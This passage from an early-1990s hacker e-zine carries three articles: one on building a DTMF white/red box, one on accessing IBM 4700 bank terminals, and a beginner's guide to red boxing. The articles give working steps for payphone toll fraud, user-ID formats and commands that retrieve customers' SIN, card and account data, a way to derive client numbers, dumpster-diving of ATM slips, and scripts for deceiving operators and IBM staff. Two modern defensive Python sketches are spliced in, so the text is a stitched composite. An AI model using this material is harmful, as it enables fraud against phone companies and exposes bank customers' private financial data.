Vm (Pin 2): The negative terminal of the back-up battery for on-hook
memory retention. A low-voltage detect circuit prevents misoperation of
the circuit in the event of a reduction in the on-hook supply voltage
below that required to retain stored data.

COLUMN & ROW Scans (Pins 3, 4, 5, 9, 11, 12, 13, 14, 15): When no key is
closed, pull-up resistors are active on COLUMN inputs and pull-down
resistors are active on ROW inputs. Therefore after a key is pressed the
ROW pull-down resistors cause a negative-true on COLUMN inputs (for
standard telephone key-pads negative-common).

Vss (pin 6): The negative supply to the device in the off-hook state.

OSC IN, OSC OUT (pin 7, 8): All logic and tone generator timing is derived
from the on-chip oscillator circuit.

MUTE OUT (pin 10): This is a CMOS output which sinks current to Vss when
no tones are being generated and sources current from Vdd when tones are
being generated.

TONE OUT (pin 16): This output is the open emitter of an NPN transistor.
The other pin (collector) is connected with the Vdd.

Well, this is the exact pin description according to the abilities and
limitations of this IC. Now this Integrated Circuit (IC) was designed to
be powered by the telephone line and a battery to keep the memory intact.
Well, due to the fact that we are powering this circuit by battery you can
feed both Vm and Vss to the same negative supply, the battery, of course.

Now the MUTE OUT pin is perhaps also bothering you; well, this circuit was
designed to drive a simple interface circuit to mute the receiver when any
key is depressed. Again this is NOT needed as you will be connecting your
DTMF generator to a small speaker rather than putting it directly into the
line, as this circuit was designed for that, so all that MUTE does is when
you start depressing keys it mutes the receiver so that it will not
interfere with other incoming sounds misstated as DTMF tones. However you
can avoid adding a speaker by un-screwing the mouth piece and feeding the
TONE-OUT and Vdd supply directly into the conventional payphones, however
this may attract unwanted glances, so you'll be better off with a speaker.

The next part is about the key-pad, perhaps complex if you plan to design
your own.
Frankly, I found that time consuming; you can buy key-pads in several
electronics stores, such as Radio Shack, but I did find it in a local
electronics store. Then again, if you have an old phone I guess you can
take it from there. Now I must warn you there are TWO types of key-pads
that are widely used, and both will work on this circuit, but you need to
know which one you have in order to make corrections.

The key-pad found in most telephones is what we call a STANDARD KEYPAD.
This has to do with the way the switch is connected inside.

                                                           │
  Simply, when a key is depressed, it closes the    ──────┬┼───Row
  switch but also comes in contact with the               │┘│
  negative power supply. Thus we call this method       ──┤ │
  NEGATIVE-COMMON or/and standard key-pad.            Vss│─┤
                                                          Col

                                                           │
  As you can see, this method consists of the row          ├──┐
  and column coming to contact (a closing of a             │
  switch). This type of keypad we call              ───────┼──■─Row
  SINGLE-CONTACT key-pad.                                  │
                                                          Col

If you plan to build your key-pad certainly the single key-pad is the way
to go, it's a lot simpler. So if you're using a standard key-pad remember
to connect the negative supply to the key-pad!

All that's left now is to connect the key-pad to the circuit, very easy
and fast; you just connect Col 1 to Col 1, Row 1 to Row 1, etc... You may
notice that this is a military-style key-pad, as it includes the A, B, C,
D keys which you don't find in your everyday phone key-pads. You really
don't need them, so if you don't have them don't alarm yourself, just
don't connect them! However you will need TWO extra keys, one for the
STORE command and the other for the REDIAL, so either add an extra key or
switch or whatever you wish and connect it, like so.

       ┌────────────────────────────Col 1
       │     ┌──────────────────────Col 2
       │     │     ┌────────────────Col 3
       │     │     │      ┌─────────Col 4
    ┌──┴──┬──┴──┬──┴───┬──┴──┐
    │  1  │  2  │  3   │  A  ├──────Row 1
    ├─────┼─────┼──────┼─────┤
    │  4  │  5  │  6   │  B  ├──────Row 2
    ├─────┼─────┼──────┼─────┤
    │  7  │  8  │  9   │  C  ├──────Row 3
    ├─────┼─────┼──────┼─────┤
    │  *  │  0  │  #   │  D  ├──────Row 4
    ├─────┼─────┼──────┼─────┤
    │Store│     │Redial│     ├──────Row 5
    └─────┴─────┴──────┴─────┘

Ahh, congrats, your DTMF Generator is now completed! If you were like
myself and added an extra switch to go from white box to red box mode,
GREAT! The only difference is that a white box needs the 3.57545 Mhz
crystal and the red box needs the corresponding crystal, so simply put a
switch and move from mode to mode.

Now for the red box to work we need five 3900 hertz at 33 milliseconds
apart and 33 milliseconds long, so you'll need to save your key five times
in memory and then simply put the box to the mouthpiece end of the
payphone and press the memory key; you have just entered $0.25 into the
payphone.

NOTE: I only have this working with the 6.5536 Mhz crystal. I cannot say
that the timing interval will be exact with the other crystals; chances
are that taking a crystal of 7.XXXXXX or 5.XXXXXX Mhz is simply too far
from the 700 + 2200 hertz tone. Try to get the closest value to 6.50 Mhz.

I didn't include the way to save the red box tone into the memory, as you
get a nice little paper when you buy the IC, but in case you don't, you
first power up the unit, press "*" (or your valid red box tone key) five
times and then you press STORE and a number in which to store it in. And
to dial the stored key, press REDIAL and the number in which you stored
the red box tone! Remember the NEW crystal should be installed at ALL
times to generate the RED BOX tone! If you save the tone with your 6.XXXX
Mhz intact and redial it with the 3.57545 Mhz it will not work!

Lastly, I recommend an "A-Cut Crystal (NTSC TV color-burst)" for both the
3.57545 and your red box crystal. Try local components stores. You should
find the crystal, or else look around, ask around; I did leave you with a
few references near here where I got most of my stuff so you can try them
out if you can't find them on your own.

REFERENCE

  Addison Ltd/Ltee
  8018 20th Avenue
  Montreal, Canada, H1Z-3S7
  tel: 1-514-376-1740

  Active Electronic Components
  6080 Metropolitan East
  Montreal, Canada, H1S-1A9
  tel: 1-514-256-7538
       1-800-363-7601 (Outside Quebec)

  Hamilton Avnet International Canada
  2570 Sabourin St., St-Laurent
  Montreal, Canada, H4S-1M2
  tel: 1-514-331-6443
       1-800-361-7129 (Outside Quebec)

  National Semiconductors Corporation
  2900 Semiconductor Drive
  Santa Clara, California 95051, USA

ALSO: Try out Motorola and RCA dealers. They carry lots of crystals that
go into TV decoders/scramblers, so there's a very good chance they should
have it. The crystals don't cost more than $1.00, keypads can be bought
for $0.75, PCBoard under $1.00, the IC goes for $2.00. The project should
cost under $5 if you can find the supplies in local stores -- if I did in
lonely Canada then you should have no trouble! If they don't have it, ask
them to order it; if they ask "why?" tell them it's for a TV component, as
TVs and related works like decoders and scramblers use NTSC TV color-burst
crystals!

NOTE: For the next InfoJournal I should have a DTMF Generator for "Caller
IDs" (yep, you can send your own DTMF Caller ID tones), and how the
number/name is received. So call up your local BBS with Caller ID and make
it display 666-6666 and logon as your favourite Death-Angel character
name. Those interested in the actual project can contact myself anytime
soon; of course you must have a grasp of electronics!

                                                          Rock Steady/NuKE
===========================================================================
===========================================================================

                 The IBM 4700 Unix Based Systems - PART I
                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

For those advanced hackers and perhaps "crazy" ones, the IBM 4700s are a
new light. These systems are generally one of the hottest systems one can
ever access. These systems are usually used in banks, and they are quite
WIDELY used in Canada and the USA. I cannot speak for other parts of the
world as I haven't been able to locate any of these huge systems yet!

In this article I will show you a quick intro on the "user-friendly"
4700s. I have also obtained REAL sample captures in order to document this
article better. This article is only being released on the "free
informational" consideration, and is solely for informational purposes.
Any attempt to carry this to a further degree can lead to serious
penalization by the law.

Anyhow let's begin. Ever wonder what type of systems banks must use, when
you step inside for a darn withdrawal or deposit of your money? The banks
do contain somewhat disturbing information about yourself and do also sell
this information to others for great deals of money. Credit Bureaus are
perhaps the best organization to work with the bankers to provide almost
all the credibility a person may hold.

One can easily notice if a bank uses the nominal IBM 4700s by a fast look
around inside the bank. Go in for a transaction and look over the cashier
and see if you spot any terminals. These terminals are simply just a
monitor and a keyboard, and the name "IBM" is usually plastered all over
the monitor, so you can at least know it's an IBM Network. Many models
have been introduced; each has an added feature as the model number
increases. Today the IBM 4700s are largely used.
All the systems in all the same banks are hooked into one vast system
located perhaps in the central bank head-offices, and each individual bank
will be hooked into this system during the work hours. I don't know what
system these 4700s hook up to; their speed seems like a very old Vax
system, however I do not know so I can not say exactly. My experience is
only with the station terminals (IBM 4700s).

The IBM 4700s nominally USED 1200/NONE Baud modems. These are perhaps due
to the fact that this system originated in the 1979-80 period. However
today many of these IBM 4700s are adding a 9600 baud modem. Starting in
1988 IBM has developed a 9600 baud modem for these IBM 4700s systems, as
it provides a faster access time and a new security feature. These modems
are known as IBM 9600 Modems Model 7861-015; these modems have CUT
possible break-ins by at least 90%. For the first time these modems were
equipped with a Data Encryption Standard (DES); during the 1988-89 period
IBM marketed these 9600 Modems at a startling $2,000 a pop to all of the
bank systems using IBMs. However, before the 9600 modems, it is only fair
to state that the software was equipped with DES that would
encrypt/decrypt information as it passes through the server in/out the
modem. The great improvement was that the 9600 Modems had DES built into
the hardware, and it would encrypt/decrypt at a much faster rate compared
to the older 1200.

Nevertheless expect to encounter DES Encryption. DES contains a 56-bit
key; if the key can be broken you have just accessed the largest system a
person can enter, thus generating the saying "Hacker's Heaven." You must
read the "Data Encryption Standard (DES)" article published in this
InfoJournal by myself to understand that DES is POSSIBLE to break.
Compared to Lucifer, DES is a lot easier, and remote access to a bank
system is very possible. Nevertheless, local access can be gained by
accessing the terminal itself within the network.

I will brief you on the functions and the work abouts of this IBM 4700s
system. One can easily know if they contain access to an IBM 4700s by its
logon feature, which follows below...

------------------------------------
 IDENTICATION MODE ADMIN./MODE (4700)

 CODE DE L'USAGER / USER ID :
 MOT DE PASSE / PASSWORD:
------------------------------------

Okay, the "---" lines simply mean that whatever is in between is the exact
input/output this system gives you once connected. Now the user ID must
follow a certain pattern as that's how accounts are used in this system.
The USER ID goes like so:

  XXX XXXXX
  │││   └────────> 5 digit number identifying the bank branch.
  ││└───────────> User Letter. If the bank allows five people to access
  ││              this system each will have a letter from A to E
  ││              representing user #1 as A, #2 as B etc...
  │└────────────> Access level: 1=Bank Manager (can do ALL).
  │                             2=Bank Director (limited, can view
  │                               all but cannot make many
  │                               changes, like cancel a loan).
  │                             4=Even less access where you cannot
  │                               view all, and are restricted in
  │                               changes.
  │                             6=View only what #4 can. No
  │                               changing possible.
  └───> Language use: X=English T=French

An example ID would be "T6A10281" whereby 10281 is the branch bank number,
A is the first account in that bank, and 6 is the level of the code and T
is the language to use (French).

Once inside the system you will receive a ":" as a prompt. No help is
given, but I did manage to find a few codes for you. Basically if one
wishes to pull out a user account we can do so with the "CLTIDT6*"
command!

  CLTIDT6* -> "*" Functions as an Enter key!
  ││││││└──> The access level (View). A 4 would allow access to
  ├┘│├┘│     make changes to the info displayed!
  │ ││ └───> Separator
  │ │└─────> "ID" = "IDentification requested"
  │ └──────> Separator
  └────────> "CL" = "CLient Info"

So we can guess this will pull out the Client's ID!

Doing a CLTIDT6* we will get a screen like so:

-------------------------------------------------------
:CLTIDT6*
        :::::::: ENREGISTREMENT CLIENT PARTICULIER ::::::::

 NO CLIENT     :
 NOM           :
 PRENOM        :
 N.A.S         :
 DATE NAISSANCE:
 EMPLOYEUR     :
 TEL           :
-------------------------------------------------------

Unfortunately, this was a French account, so all the captures I have are
in French. Here's a quick lesson: NOM --> name; PRENOM --> given name;
N.A.S --> Social Insurance Number (SIN); DATE NAISSANCE --> date of birth.
The rest is simple. To search for a person you must try to fill in AS MUCH
as possible to search for an account! The more INFO you've got the better
it is.

Once you have entered enough data you get two screens that are as follows.
Since this is French, I added the English translation inside the
parentheses.

-------------------------------------------------------
 NO CLIENT      : (Client number)      TRANSIT: (5-digit bank #)
 NO CARTE CLIENT: (Client info number) DEPUIS : (Client since)
 NOM            : (Real last name)
 PRENOM         : (Given name)         SEXE   : (Sex)
 ADRESSE NO: (Address #) RUE : (Street)          APP.:
 VILLE          : (City)
 PROVINCE       :
 PAYS           : (Country)
 CODE POSTAL    : (Postal/ZIP code)
 A/S            :
 LANGUE         : (Language)
 TEL.           :
 N.A.S          : (SIN)
 DATE NAISSANCE : (Birth)
 NO PERMIS COND.:
                :
--------------------------------------------------------

Pressing Enter will give you the next and final screen:

--------------------------------------------------------
 NO CLIENT   :
                      ACTUEL                  PRECEDENT
 EMPLOYEUR   : (Current employer)      (Last employer)
 POSTE OCCUPE: (Job title)
 DATE DEBUT  : (Since)                 DEBUT:(Since) FIN:(Until)
 CODE:       TYPE:                     TYPE :
 TELEPHONE   :
 MASTER CARD : (M/C card number)
 VISA        : (Visa card number)
 CARTE CLIENT: (Automatic bank card number)
 NO COMPTE   : (Account numbers [and balance if access >= 4])
             :
             :
             :
             :
--------------------------------------------------------

Con't in Part #2

                The IBM 4700s Unix Base Systems - PART II
                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Everyone can now understand exactly how powerful a 4700s System really is.
But perhaps the mind boggling truth is that this information can be easily
tapped into illegally, and such information can cause great havoc.

Perhaps the most mind boggling feature that I seem to have found
interesting is the search/profile of a client. In this section you can
search a client in the bank with only needing VERY LITTLE information.
There are six nominal ways to search for the client's profile and they are
by:

1. The Client Number (Format: XXXXX#########)
   The "X" represent letters and the "#" represent numbers. In order to
   get the Client Number you could have written it from getting it in the
   first part! But the first part demands lots of information of a person,
   in order to get it. With this all you need is the person's last name,
   first letter of the given name and date of birth.

   Eg: John Smith -- Date of Birth 75-04-21
       Client Number = SMITJ249578001

   The way we got the number part is like so: take the date of birth and
   subtract it from 99-99-99.
   So 75-04-21 = (9-7)(9-5) - (9-0)(9-4) - (9-2)(9-1).
   The last three digits are just in case there are people with the same
   names and date of birth, kind of rare; 001 is usually ok, but try 002
   if another guy exists.

2. Client Enterprise Number (Business Client Number)
   Same as above but for companies.

3. Valid Account Number

4. Valid Account Number of a Term-Deposits

5. Automatic Teller Cards

6. Credit Card (M/C or VISA)

One boggling fact is this one: when you go to an Automatic Teller Machine,
check the garbage. You will see that some people will throw away their
slips once they read the balance of the account. One DRAWBACK is that on
the slip you will see your Automatic Teller Card Number written on top!
This is particularly true for Canada's largest banks like Royal Bank,
National Bank and TD Banks that nominally use IBM 4700s! All one must do
is easily take your slip and ALL they need on you can be found in the
4700s systems, and slowly you find yourself in financial trouble.
Sometimes "free information" such as these articles are written for your
protection. The world is truly ruled by little bits of 1s and 0s, and
turning on the right bits can give you access to virtually anything.

The code to access this search/profile is with the "CLTPR6*" command.
Which will give you:

-------------------------------------------------------
:CLTPR6*
 1. NO DE CLIENT PARTICULIER :          (Client #)
 2. NO DE CLIENT ENTREPRISE  :          (Client # comp.)
 3. NO COMPTE BANCAIRE       :          (Bank account #)
 4. NO COMPTE PLACEMENT      :          (Term-Lock account)
 5. NO COMPTE CARTE CLIENT   : XXXXXX-  (Teller card number)
 6. NO COMPTE MASTERCARD     : XXXX-    (M/C card number)
--------------------------------------------------------

The "Xs" are for SET numbers; depending on what Bank system you enter, the
M/C and Teller Card always begin with the same first few digits. For
Manhattan Bank M/C begin with 5424... Of course if you enter a Royal Bank
the terminal will read VISA card number rather than M/C as Royal offers
the VISA card. A search with this will get the two screens from the last
part.

There are also ways to find out loan information, or how many
term-deposits one has at whatever interest rate.
With the right access codes like a T2 or a T1 you can access or void any
of these accounts. HOWEVER: as easy as this sounds, it is quite difficult,
then again not difficult enough! Even if you wish to close your account in
any bank your Information does NOT become erased, as I demonstrated this
to Pure Energy who closed his accounts several years ago, though the
information I got was quite old, as his address was invalid. Nevertheless
I did get his date of birth, SIN and other information that can be used to
access other systems in other banks to gain faster access to his accounts.

Again this seems quite easy; I warn you not to try it, it will get you
penalized by the lawman. Anytime you try to change accounts or access too
much information the system creates a log, and alerts the administrators.
All the access commands I was able to find out are at the bottom:

 -Identification of a client              CLTIDT6 *
 -Profile of a Client                     CLTPRO6 *
 -List of active and closed loans         CTTACT6 / # Client Number
 -List of account numbers of a client     CLTDPT6 / # Client Number
 -List of Term Deposits of a Client       DPTCDC6 / # Client Number

I hope you found this information useful for your own protection. Remember
don't leave any slips from automatic tellers, and never say your account
number to a cashier; write it down and show it to them. A lot can be done
to ruin you financially with the info these systems contain. And last but
not least I am not responsible for any attempts that you try to illegally
access these systems. I know IBM will be GLAD to help you in sending you
information on these systems; of course you will have to "pretend" you're
part of a big corporation looking into their network!

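The article says the system logs, and alerts administrators on, account changes and excessive lookups. A sketch of that kind of audit-log check, as an added example that is not part of the original article and not IBM's software: the log line layout, the thresholds, the rule names and the numeric comparison of level digits are assumptions, while the user ID and command layouts follow the article's description.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# User ID layout from the article: language (X/T), access level (1, 2, 4, 6),
# user letter, five-digit branch number.
USER_ID = re.compile(r"^(?P<lang>[XT])(?P<level>[1246])(?P<user>[A-Z])(?P<branch>\d{5})$")
# Command layout from the article: letter mnemonic, one level digit,
# then "*" or "/" followed by an argument.
COMMAND = re.compile(r"^(?P<name>[A-Z]{5,6})(?P<level>\d)\s*(?P<rest>[*/].*)?$")

# Constructed sample log. Assumed layout: timestamp, terminal, user ID, command.
SAMPLE_LOG = """\
1993-03-01T09:00:05 TERM03 X4B10281 CLTIDT4*
1993-03-01T09:01:10 TERM07 T6A10281 CLTIDT6*
1993-03-01T09:01:20 TERM07 T6A10281 CLTPRO6*
1993-03-01T09:01:30 TERM07 T6A10281 CLTDPT6/AAAAA000000001
1993-03-01T09:01:40 TERM07 T6A10281 DPTCDC6/AAAAA000000001
1993-03-01T09:05:00 TERM07 T6A10281 CLTIDT4*
1993-03-01T09:06:00 TERM09 Q9Z1 CLTIDT6*
"""


def scan(lines, max_lookups=3, window=timedelta(seconds=60)):
    """Return alerts as (rule, user_id, detail) tuples, in log order.

    Rules (all assumptions made for this example):
      bad-user-id     user ID does not match the documented layout
      unknown-command command does not match the documented layout
      level-mismatch  command carries a more privileged level digit than
                      the user ID (lower digit = more access in the article)
      bulk-lookup     more than max_lookups commands from one user ID inside
                      the sliding window; reported once per user ID
    """
    alerts = []
    recent = defaultdict(deque)   # user ID -> timestamps inside the window
    flagged = set()               # user IDs already reported for bulk lookups

    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        parts = raw.split(None, 3)
        if len(parts) != 4:
            alerts.append(("malformed-line", "-", raw))
            continue
        stamp, terminal, user_id, command = parts
        when = datetime.fromisoformat(stamp)

        user = USER_ID.match(user_id)
        if user is None:
            alerts.append(("bad-user-id", user_id, terminal))
            continue
        cmd = COMMAND.match(command)
        if cmd is None:
            alerts.append(("unknown-command", user_id, command))
            continue

        # A view-only ID (level 6) issuing a level-4 command is asking for
        # more access than the account was given.
        if int(cmd["level"]) < int(user["level"]):
            alerts.append(("level-mismatch", user_id, command))

        # Sliding-window count of commands per user ID.
        seen = recent[user_id]
        seen.append(when)
        while when - seen[0] > window:
            seen.popleft()
        if len(seen) > max_lookups and user_id not in flagged:
            flagged.add(user_id)
            detail = f"{len(seen)} lookups in {int(window.total_seconds())}s"
            alerts.append(("bulk-lookup", user_id, detail))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print(alert)
```
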
                                                          Rock Steady/NuKE
===========================================================================
===========================================================================

                     A Beginner's Guide to Red Boxing
                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

About six months ago I made my first red box, and let me tell you, this is
the way to go. With the ever-increasing dangers of phreaking, red boxing
provides a safe, effective alternative that is easily available to those
with little technical knowledge and allows calls anywhere in the world
with only a small investment. Before I elaborate on how to construct your
red box (unlike Rock Steady, I took the easy way out and used the
now-famous Radio-Shack conversion) and list some of the "tricks of the
trade," let's list the pros and cons of red boxing compared to other forms
of phreaking.

Pros
~~~~
* UNTRACEABLE! Fuck ESS, nothing can find you with a red box! You're just
  an average joe using a pay phone. Even if they do catch on, you can just
  hang up and try again... Just don't abuse the same pay phone for
  hundreds of dollars a month and everything's cool.

* Small, easy-to-carry unit is portable, durable, and looks like a
  legitimate pocket dialer...

* Perfect line quality. No static, no loss of volume, etc. unlike PBXs,
  extenders, and other commonly-abused phone systems.

* Low cost...thirty dollars gets you unlimited free calls (I estimate I've
  "spent" over $500 so far). The only upkeep cost is new batteries every
  few months. There's not even any cost at all for each call you make, not
  even local charges, as with PBXs (if applicable in your area).

Cons
~~~~
* Simply put, it's a hassle. You have to drag yourself out to a pay phone
  to use it. You have to keep pressing the button periodically to add more
  "money." Such is the price for free calls, I suppose...

* Because you're using a pay phone, calls are voice-only.
  Not only are acoustic couplers slow and laptop use unusual (ahem), but
  pay phones make a click every minute, plus you constantly get a
  synthesized voice or operator demanding more money every so often.

* Sometimes you can get a suspicious operator... Your average operator is
  of limited intelligence (hell, I've even told an AT&T operator what I'm
  doing, and she still didn't get it [Me: "Hi, I'd like to red box a call
  to Paris." Bitch: "You'll be paying with quarters?" Me: "No, I'm red
  boxing it. It's a device for committing toll fraud." Bitch: "Sorry sir,
  I'm not familiar with that calling plan. Do you want to pay with your
  calling card?" Sheesh!]. Then again, five out of five randomly-sampled
  AT&T operators didn't know what 2600 Hz is, but that's another story...)
  Still, it's a chance. I've gotten a few suspicious operators who hassle
  you and return your "money" and ask you to reinsert it, and even one who
  knew what I was doing ("Ok sir, none of your quarters have registered.
  I'm afraid I'm going to have to report that pay phone. You aren't using
  quarters, the tones are coming from a small black box." I just denied it
  and she reconnected me, but I kept *that* call short. Sorry Lone Wolf.)
  I've even once gotten an intelligent local operator (gasp!) ("Okay,
  please insert a quarter now... I'm sorry sir, that did not sound like
  the quarter tone. Do you want to try inserting a real coin?") You can
  always hang up and hope you get a less intelligent one, but it's a pain
  in the ass.

* At least in my area, local calls cannot be boxed directly...you have to
  either go through an operator or use an Equal Access override code (see
  below). Another hassle.

* To my knowledge, this only works on the North-American phone system...
  Tough luck for all you foreigners :-).

* Doesn't work on COCOTs, only pay phones owned by the local telco.

Notes from Nowhere Man
~~~~~~~~~~~~~~~~~~~~~~
All of the above may not apply in your area; it all depends on how your
local telco runs things.
Specifically, in some areas you *may* be able to directly box local calls.

Certain phones don't seem to allow the tones to get through. So far, I've only found three such phones, two at one location (a gas station). Hopefully this is just a fluke and not some kind of trend...

Also, don't think that you can get money by using your box and asking the operator for your money back. It won't work. You see, the actual coins that you've deposited are returned to you, and since you've put nothing in, you get nothing out.

I'd also like to add that contrary to what it says in some text files, it is not necessary to deposit a nickel before making a call. Supposedly the phone company performs a "ground test" when you make a call, so something has to be in the coin chute for the call to go through. This may or may not be true, but I've never deposited a coin before boxing a call and I've never had any problems directly due to this (I've gotten a few suspicious operators, but they've always relented after I "re-deposit" my "quarter" which didn't seem to register. Of course, the international operators at AT&T are much better informed...)

Building Your Red Box
~~~~~~~~~~~~~~~~~~~~~
There are only two real components for a red box, at least using the "standard" method. The easiest part to get (but the more expensive one) is a Radio Shack "Thirty-Three Number Memory Pocket Tone Dialer," catalog number 43-141 (just ask the guy for "a tone dialer that can store numbers" to play dumb). At last check these are US$24.95 each (and they're kept behind the counter, so thieving is basically out unless you have inside connections). Be sure to get the one with memory features; the one with no memory is useless.

The second thing you'll need is a 6.5536 MHz crystal. These can be obtained from your local electronics store (they're hard to find though, I know Radio Shack doesn't carry them) or from a mail order electronics distributor.
(One frequently mentioned is Fry's Electronics in San Francisco, which sells these crystals for $0.89/each. They can be reached at 415-770-3763. I did not get my crystal from Fry's, so I cannot vouch for them.) In most cases the crystals cost between $.25 and $1.00 each, plus postage, if applicable.

Oh yeah, you'll also need three AAA batteries. You can just pick these up at the local convenience store or buy them at Radio Shack when you buy the tone dialer. (Note: There is a rumor that Radio Shack is no longer offering the tone-dialer with memory. The stores in my area still have them in stock, but in some places they're supposedly unavailable. Get 'em while you can.)

The only tools you'll need to make the red box are a small phillips screwdriver and a soldering iron (and solder). A pair of tweezers may also be useful. You'll want to work in a well-lit place, naturally, with good ventilation (solder gives off horrid fumes).

First, unscrew the screws on the back of the tone dialer's case (there are some in the battery compartment, too). Carefully pry open the case; you'll need to apply more force than you would think, but be careful not to break it or lose the switches, which can fall out when the case is opened. Next, solder out the 3.579 MHz crystal, which looks like a small silver cylinder toward the bottom-right of the board. Remove the crystal and save it. In its place, solder in your 6.5536 MHz crystal, being careful not to let the two leads touch one another, or to drip solder across the two leads. Because the new crystal is much larger than the old one, you may have to *CAREFULLY* bend a few other crystals to make room for it. Put the cover back on, and rescrew the case. Finally, pop in the three AAA batteries the dialer requires. You're now ready to program your box.

Programming Your Red Box
~~~~~~~~~~~~~~~~~~~~~~~~
Ok, you've just replaced the crystal in your pocket dialer. Now what do you do? It's pretty easy.
Switch the Store/Dial switch to "Store" and turn the unit on. The red LED in the upper-left should go on (if it doesn't, you screwed up; open it up and try again). Now press the "Mem" button (left-most button on the bottom row) and then hit the star key ("*") five (5) times. Then press Mem again and press a "Priority" button (one of the top three buttons); I like to use P3 for this. The unit should beep, letting you know that the number was stored. This button is now the "quarter" key.

Next, press the Mem button, press P3 (or whatever button you used for the quarter key), Pause (the middle button on the bottom row), P3, etc. (As an alternative to the Pause button, I have been informed that you can use the pound key instead, making your dialing much quicker. I wouldn't use this on a live operator, though... After experimenting with this method, I've found that it tends to bring a live operator on the line very often.) You want to store four "quarters" and five pauses total, a pause between each "quarter." Then hit Mem again, then P2 (or whatever key you want to use for the $1.00 key), and wait for the beep.

Flip your unit off, then switch the Store/Dial switch to Dial. Your red box is now ready.

Why Does This Work?
~~~~~~~~~~~~~~~~~~~
You may be asking yourself "how in the world can this work?!" Basically, the red box works on the principle that when you put money into a pay phone tones are generated to indicate to the CO that you've dropped in a coin; the red box simulates these tones, allowing you to make calls for free. When you replace the factory-installed 3.579 MHz crystal with the 6.5536 MHz one, you are altering the DTMF tones upward so that the star key now happens to be the same pitch as a coin tone (1700 Hz + 2200 Hz).
When you store the five tones, nothing particular happens; but it so happens that Radio Shack pocket dialers replay those stored tones at the precise rate that a pay phone expects for a quarter (five thirty-three millisecond beeps with a thirty-three millisecond pause between each of the bleeps). (It is possible to simulate nickel and dime sounds, too, but the timings are different, and would require much more work for something that's really useless. Why use small coins when you can just use quarters?)

Please note that because of the tone shift caused by the crystal, the touch-tone keys will no longer work right...your box is no longer a pocket dialer. For those interested in keeping the dialing feature, try building the COMBO box (red/white box), as detailed in text files and 2600 Magazine, Autumn 1992 issue.

For more information on red box theory, and for plans on how to build a "true" red box (this requires much more time, effort, and skill, and gives no benefit), check out other files on red boxes (RED.BOX, etc.). Also refer to Rock Steady's excellent article on red boxing in this issue. Rock Steady takes the "electronics" approach; being a novice at electronics I elected to take the easy way and just modify the tone dialer. (Remembering what it's like to have no idea what the fuck you're doing, I wrote this file as explicitly as possible. Forgive me if it seems *too* detailed for you.)

Placing Calls
~~~~~~~~~~~~~
To place a call with a red box, put the speaker on the tone dialer firm against the mouthpiece of the pay phone, making sure the black rubber ring on the back of the dialer fits snugly against the mouthpiece, turn it on (you can verify that it's on by the LED in the upper-left), and press the priority (P) buttons as needed to generate quarter sounds. Details are given for the three types of phone calls: intra-LATA, inter-LATA, and international.
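
Added example, not part of the original article: the "Why Does This Work?" section says the crystal swap scales every tone upward until the star key lands on the coin-tone pair. The Python below carries that scaling through with the article's crystal values and then measures, on the receiving side, how far a burst sits from the nominal 1700 Hz + 2200 Hz pair. The 8 kHz sample rate, the 0.4 % acceptance window and the in-memory test bursts are assumptions constructed for the illustration.

```python
import math

FS = 8000                       # sample rate in Hz (assumed: telephone-band PCM)
COIN_PAIR = (1700.0, 2200.0)    # coin-tone pair as stated in the article
DTMF_STAR = (941.0, 1209.0)     # standard DTMF row and column tones for "*"
XTAL_STOCK_MHZ = 3.579          # factory crystal, value as given in the article
XTAL_SWAP_MHZ = 6.5536          # replacement crystal, value as given in the article
MAX_OFFSET = 0.004              # assumed acceptance window of +/-0.4 % (hypothetical)


def shifted_pair(pair=DTMF_STAR):
    """Tones produced after the swap: the dialer derives every tone from the
    crystal, so each output scales by the ratio of the two crystals."""
    ratio = XTAL_SWAP_MHZ / XTAL_STOCK_MHZ
    return tuple(f * ratio for f in pair)


def two_tone_burst(f_low, f_high, ms=33):
    """Constructed test input: one burst of two summed sines, held in memory."""
    n = int(FS * ms / 1000)
    return [math.sin(2 * math.pi * f_low * i / FS) +
            math.sin(2 * math.pi * f_high * i / FS) for i in range(n)]


def hann(samples):
    """Apply a Hann window so each tone leaks as little as possible into the other."""
    n = len(samples)
    return [s * (0.5 - 0.5 * math.cos(2 * math.pi * i / (n - 1)))
            for i, s in enumerate(samples)]


def power_at(windowed, freq):
    """Signal power at one arbitrary frequency (a single DFT bin, not FFT-aligned)."""
    re = im = 0.0
    for i, s in enumerate(windowed):
        ang = 2 * math.pi * freq * i / FS
        re += s * math.cos(ang)
        im -= s * math.sin(ang)
    return re * re + im * im


def peak_frequency(windowed, nominal, span=60.0, step=1.0):
    """Scan +/-span Hz around a nominal tone and return the strongest frequency."""
    count = int(2 * span / step) + 1
    candidates = [nominal - span + k * step for k in range(count)]
    return max(candidates, key=lambda f: power_at(windowed, f))


def classify(samples):
    """Measure both tones and accept only if each lies inside the window.

    Returns (verdict, measured frequencies in Hz, fractional offsets)."""
    windowed = hann(samples)
    measured = [peak_frequency(windowed, f) for f in COIN_PAIR]
    offsets = [(m - f) / f for m, f in zip(measured, COIN_PAIR)]
    ok = all(abs(o) <= MAX_OFFSET for o in offsets)
    return ("accept" if ok else "reject"), measured, offsets


if __name__ == "__main__":
    for label, pair in (("nominal coin pair", COIN_PAIR),
                        ("crystal-shifted star key", shifted_pair())):
        verdict, measured, offsets = classify(two_tone_burst(*pair))
        detail = ", ".join("%.0f Hz (%+.2f %%)" % (m, 100 * o)
                           for m, o in zip(measured, offsets))
        print("%-26s %s: %s" % (label, verdict, detail))
```

With the article's figures the shifted star key comes out near 1723 Hz + 2214 Hz, about 1.4 % and 0.6 % above nominal, so a receiver that measures frequency this tightly would reject it.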

Intra-LATA (local)
~~~~~~~~~~~~~~~~~~
If you're in the same boat I am, you may not be able to box local calls. If this is the case, just dial the operator and explain to her how you need to place a call to wherever. Usually she'll just ask for your quarter, but sometimes she'll ask why you don't do it yourself; in this case, you can either feign ignorance ("Ah, iz zhat so? I ahm zorry, I ahm visiting from Germany unt zhere ve have to make khalz through zee operator. Can you dial it for me?") or feed her some story how the phone keeps swallowing your quarters or not recognizing them or something. When she asks for the quarter (or possibly more), give it to her...just press the "quarter" key however many times is needed, leaving a slight pause between each one to avoid suspicion (after all, no human can drop in a quarter per second). "Thank you, please hold. CLICK. RING..."

